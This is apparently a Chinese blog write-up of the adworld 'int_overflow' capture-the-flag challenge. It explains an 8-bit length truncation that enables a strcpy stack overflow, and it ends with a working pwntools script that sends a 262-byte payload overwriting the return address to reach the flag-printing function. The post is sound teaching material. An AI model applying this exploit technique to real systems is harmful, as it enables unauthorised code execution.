• adworld int_overflow | 整形溢出


    题目链接

    这是一道帮助理解整形溢出的题,以前搞OI用自然溢出写过哈希,但那时不知道原理,布太星。

    先用checksec查壳,可以栈溢出:

    然后用IDA打开附件,先看一下字符串窗口。

    发现有cat flag的字符串,定位到执行它的函数,先记下地址0x804868B

    然后看由主函数调用的login()函数,F5之后改一下变量别名,关注一行伪代码:read(0, &passwd, 0x199u);

    然后调用了check_passwd(char *passwd)函数,溢出点就在这个函数里。

    len是个unsigned int 8,而strlen()返回值是一个size_t类型的变量,它是无符号32bit的。

    在第7行赋值的过程中,编译器会截断后者的末八位赋值给前者。8位的最大值是 (255) ,所以如果passwd字符串长度超过 (255) 就会发生自然溢出。

    第二个溢出点是在第17行的strcpy语句中,可以完成一次栈溢出。

    后面的判断语句告示我们如果要触发第二个溢出点需要满足 (4<len≤7)

    所以构造的 (payload) 长度区间为 ([261,264]) ,这里选用 (262)

    之后就是栈溢出的问题了,用前面的地址覆盖掉函数的返回地址并保证长度即可。

    脚本如下:

    #python 3.5
    from pwn import *
    #io = process('./source')
    io = remote('111.198.29.45','50364')
    payload = b'a'*0x18 + p32(0x0804868B) + b'a'*234
    #0x18 = 24 262 - 24 - 4 = 234
    io.recvuntil('Your choice:');
    io.sendline('1')
    io.recvuntil('Please input your username:
    ')
    io.sendline('NAME')
    io.recvuntil('Please input your passwd:
    ')
    io.sendline(payload)
    io.interactive()
    

  • 相关阅读:
    软件体系架构会议纪要
    漫谈架构之阅读笔记02
    漫谈架构之阅读笔记01
    学习进度报告01
    以《淘宝网》为例,描绘质量属性的六个常见属性场景。
    软件架构师的工作方式
    软件体系架构课堂测试02
    系统安全——访问控制
    信息安全技术——物理环境与设备安全、虚拟专用网
    信息安全技术——防火墙、入侵检测技术
  • 原文地址:https://www.cnblogs.com/zhwer/p/12504511.html
Copyright © 2020-2023  润新知